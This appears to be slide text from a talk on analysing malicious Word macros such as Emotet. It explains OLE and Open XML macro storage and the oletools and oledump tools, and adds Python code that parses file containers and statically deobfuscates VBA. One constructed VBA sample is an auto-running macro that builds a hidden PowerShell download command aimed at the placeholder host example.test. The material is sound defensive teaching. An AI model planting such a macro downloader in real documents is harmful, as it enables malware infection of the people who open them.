2. MALICIOUS WORD DOC ANALYSIS
EMOTET
▸ Attackers are actively using Word docs with obfuscated macros
▸ The macro runs a PowerShell script to download the main executable
3. MALICIOUS WORD DOC ANALYSIS
HOW ARE MACROS STORED?
▸ MS Office 97-2003 documents
▸ Microsoft Compound File Binary (CFB), a.k.a. OLE (Object Linking and Embedding)
▸ Like a filesystem
▸ Consists of segments called streams
▸ The VBA storage contains the macro source code in compressed form
https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-doc/ccd7b486-7881-484c-a137-51170af7cc22
4. MALICIOUS WORD DOC ANALYSIS
HOW ARE MACROS STORED?
▸ MS Office 2007+ documents
▸ MS Open XML format
▸ XML files in a ZIP archive
▸ Macros are stored in a binary OLE file within the ZIP archive called “vbaProject.bin”
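To make the two storage layouts on slides 3 and 4 concrete, here is an added Python example (not from the slides, and not oletools or oledump code) that uses only the standard library: it tells the two container formats apart by their leading bytes, parses the fixed part of the MS-CFB header to show the sector layout behind the "like a filesystem" description, and for the ZIP-based format lists the embedded vbaProject.bin parts, which are themselves OLE containers. The two sample inputs it builds (a bare 512-byte CFB header and a minimal .docm-style ZIP) are constructed for the example and carry no macro code.

```python
import io
import struct
import zipfile

OLE_MAGIC = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"   # CFB/OLE signature (MS-CFB section 2.2)
ZIP_MAGIC = b"PK\x03\x04"                          # local file header of a ZIP (Open XML container)

# Fixed 76-byte part of the CFB header, little-endian, no padding:
# signature, CLSID, minor, major, byte order, sector shift, mini sector shift,
# reserved, dir sectors, FAT sectors, first dir sector, transaction number,
# mini stream cutoff, first mini FAT sector, mini FAT sectors, first DIFAT sector, DIFAT sectors
CFB_HEADER_FMT = "<8s16sHHHHH6sIIIIIIIII"
ENDOFCHAIN = 0xFFFFFFFE
FREESECT = 0xFFFFFFFF


def parse_cfb_header(data):
    """Parse the fixed part of a Compound File header and describe its sector layout."""
    if len(data) < 512 or not data.startswith(OLE_MAGIC):
        raise ValueError("not a Compound File Binary (OLE) container")
    (_sig, _clsid, minor, major, byte_order, sector_shift, mini_shift, _reserved,
     _dir_sectors, fat_sectors, first_dir_sector, _txn, mini_cutoff,
     _first_minifat, _minifat_sectors, _first_difat,
     _difat_sectors) = struct.unpack_from(CFB_HEADER_FMT, data, 0)
    if byte_order != 0xFFFE:
        raise ValueError("unexpected byte-order marker")
    return {
        "version": f"{major}.{minor}",
        "sector_size": 1 << sector_shift,        # 512 bytes for v3, 4096 for v4
        "mini_sector_size": 1 << mini_shift,     # normally 64 bytes
        "fat_sectors": fat_sectors,
        "first_directory_sector": first_dir_sector,
        "mini_stream_cutoff": mini_cutoff,       # streams smaller than this live in the mini stream
    }


def classify_document(data):
    """Return ("ole", header info) for 97-2003 files, ("ooxml", [OLE vbaProject parts]) for 2007+ ZIPs.

    Identification is by leading bytes, not file extension, so a renamed file is classified the same way.
    """
    if data.startswith(OLE_MAGIC):
        return "ole", parse_cfb_header(data)
    if data.startswith(ZIP_MAGIC):
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            # The macro container can sit under word/, xl/ or ppt/; it must itself be an OLE file.
            vba_parts = [name for name in zf.namelist()
                         if name.lower().endswith("vbaproject.bin")
                         and zf.read(name).startswith(OLE_MAGIC)]
        return "ooxml", vba_parts
    return "unknown", None


def build_sample_cfb_header():
    """Constructed sample: a version 3 CFB header (512-byte sectors) with an all-free DIFAT."""
    fixed = struct.pack(CFB_HEADER_FMT, OLE_MAGIC, b"\x00" * 16,
                        0x3E, 3, 0xFFFE, 9, 6, b"\x00" * 6,
                        0, 1, 1, 0, 4096, ENDOFCHAIN, 0, ENDOFCHAIN, 0)
    difat = struct.pack("<I", FREESECT) * 109          # 109 DIFAT entries complete the 512-byte header
    return fixed + difat


def build_sample_docm():
    """Constructed sample: a minimal Open XML ZIP whose word/vbaProject.bin is an empty OLE header."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/vbaProject.bin", build_sample_cfb_header())
    return buf.getvalue()


if __name__ == "__main__":
    for label, sample in (("legacy .doc", build_sample_cfb_header()),
                          ("Open XML .docm", build_sample_docm())):
        print(label, classify_document(sample))
```

For a real document the same call works on `open(path, "rb").read()`; if the result is `("ooxml", [])` the file has no macro container at all, which is a quick triage check before handing the file to olevba or oledump.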
5. MALICIOUS WORD DOC ANALYSIS
EXTRACT MACROS FROM WORD DOCS
▸ oledump: https://blog.didierstevens.com/programs/oledump-py/
python oledump.py DOC_NAME
▸ oletools: https://github.com/decalage2/oletools
sudo -H pip install -U oletools
▸ oleid: to analyze OLE files to detect specific characteristics usually found in malicious files.
▸ olevba: to extract and analyze VBA macro source code from MS Office documents (OLE and OpenXML).
▸ olebrowse: a simple GUI to browse OLE files (e.g. MS Word, Excel, PowerPoint documents), to view and extract individual data streams.
▸ olemeta: to extract all standard properties (metadata) from OLE files.
▸ oletimes: to extract creation and modification timestamps of all streams and storages.
▸ oledir: to display all the directory entries of an OLE file, including free and orphaned entries.
▸ olemap: to display a map of all the sectors in an OLE file.
6. MALICIOUS WORD DOC ANALYSIS
EXTRACT MACROS FROM WORD DOCS
▸ oletools: https://github.com/decalage2/oletools
▸ olevba: to extract and analyze VBA macro source code from MS Office documents (OLE and OpenXML).
7. MALICIOUS WORD DOC ANALYSIS
EXTRACT MACROS FROM WORD DOCS
▸ oledump: https://blog.didierstevens.com/programs/oledump-py/
8. MALICIOUS WORD DOC ANALYSIS
EXTRACT CMD / POWERSHELL FROM VBA SCRIPT
▸ There is going to be a lot of:
  ▸ Unused benign code
  ▸ Junk code
  ▸ Obfuscation
  ▸ String replacements
▸ The PowerShell code will be the downloader
▸ Download URLs will be obfuscated
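Slide 8 describes the manual part of the job: stripping junk and undoing string tricks until the PowerShell command line and its URL are readable. The following added Python example (not from the slides, and not an olevba feature) shows the mechanical core of that step: a small evaluator for the string expressions such macros build their command from (literal concatenation with `&`, `Chr()`, `StrReverse()` and `Replace()`), which tracks variable assignments line by line and resolves whatever is handed to `Shell`. The VBA fragment it runs on is constructed for the example to imitate the patterns named on the slide; the domain `example.test` is a placeholder, not an indicator from any real sample.

```python
import re

# Constructed sample VBA, not taken from any real document: junk declarations,
# Chr() and StrReverse() string building, and a Replace() call hiding the URL.
SAMPLE_VBA = r'''
Sub AutoOpen()
    ' junk code: declared but never used
    Dim junk As Integer, unused As String
    Dim a As String, b As String, c As String
    a = "pow" & Chr(101) & "rshell -w hidden -c "
    b = StrReverse("tseuqeRbeW-ekovnI")
    c = Replace("h**p://example.test/update.bin", "**", "tt")
    cmd = a & b & " -Uri '" & c & "'"
    Shell cmd, vbHide
End Sub
'''

# Tokens: VBA string literal ("" escapes a quote), integer, identifier, operator/punctuation
TOKEN_RE = re.compile(r'"((?:[^"]|"")*)"|(\d+)|([A-Za-z_]\w*)|([&+(),])')
ASSIGN_RE = re.compile(r'^\s*(?:Set\s+)?([A-Za-z_]\w*)\s*=\s*(.+?)\s*$')
SHELL_RE = re.compile(r'^\s*(?:Call\s+)?Shell\s+(.+?)\s*(?:,\s*\w+)?\s*$', re.I)
URL_RE = re.compile(r'https?://[^\s\'"]+', re.I)


def tokenize(text):
    tokens = []
    for m in TOKEN_RE.finditer(text):
        if m.group(1) is not None:
            tokens.append(("str", m.group(1).replace('""', '"')))
        elif m.group(2) is not None:
            tokens.append(("num", m.group(2)))
        elif m.group(3) is not None:
            tokens.append(("id", m.group(3)))
        else:
            tokens.append(("op", m.group(4)))
    return tokens


class StringEvaluator:
    """Evaluates the subset of VBA string expressions used for command building.

    Supported: literals, variables, & and + concatenation, Chr/ChrW, StrReverse, Replace.
    Integer arithmetic is deliberately not modelled; numbers are treated as text.
    """

    def __init__(self, variables):
        self.vars = variables
        self.toks, self.pos = [], 0

    def evaluate(self, text):
        self.toks, self.pos = tokenize(text), 0
        return self.expr()

    def peek(self):
        return self.toks[self.pos] if self.pos < len(self.toks) else (None, None)

    def take(self):
        tok = self.peek()
        self.pos += 1
        return tok

    def expr(self):
        value = self.term()
        while self.peek() in (("op", "&"), ("op", "+")):
            self.take()
            value += self.term()
        return value

    def term(self):
        kind, val = self.take()
        if kind in ("str", "num"):
            return val
        if kind == "id":
            name = val.lower()
            if self.peek() == ("op", "("):          # function call
                self.take()
                args = [self.expr()]
                while self.peek() == ("op", ","):
                    self.take()
                    args.append(self.expr())
                self.take()                         # closing parenthesis
                return self.call(name, args)
            return self.vars.get(name, "")          # variable reference, "" if never assigned
        raise ValueError(f"unexpected token {kind!r} {val!r}")

    def call(self, name, args):
        if name in ("chr", "chrw"):
            return chr(int(args[0]))
        if name == "strreverse":
            return args[0][::-1]
        if name == "replace":
            return args[0].replace(args[1], args[2])
        raise ValueError(f"unsupported function {name}")


def recover_commands(vba_text):
    """Walk the macro line by line, resolve assignments, and return what reaches Shell."""
    variables = {}
    ev = StringEvaluator(variables)
    commands = []
    for line in vba_text.splitlines():
        m = ASSIGN_RE.match(line)
        if m:
            variables[m.group(1).lower()] = ev.evaluate(m.group(2))
            continue
        m = SHELL_RE.match(line)
        if m:
            commands.append(ev.evaluate(m.group(1)))
    return commands


def extract_urls(commands):
    """Pull the now-deobfuscated download URLs out of the recovered command lines."""
    return [url for cmd in commands for url in URL_RE.findall(cmd)]


if __name__ == "__main__":
    cmds = recover_commands(SAMPLE_VBA)
    for cmd in cmds:
        print("Shell ->", cmd)
    print("URLs  ->", extract_urls(cmds))
```

The evaluator is intentionally a static pass rather than a VBA interpreter: it never executes the macro, only follows the string plumbing, so it is safe to run over untrusted samples, and any construct it cannot resolve raises instead of guessing. Real samples add loops, arrays and `Split`/`Mid` tricks on top of these four operations, and extending `call` with them is the usual next step during analysis.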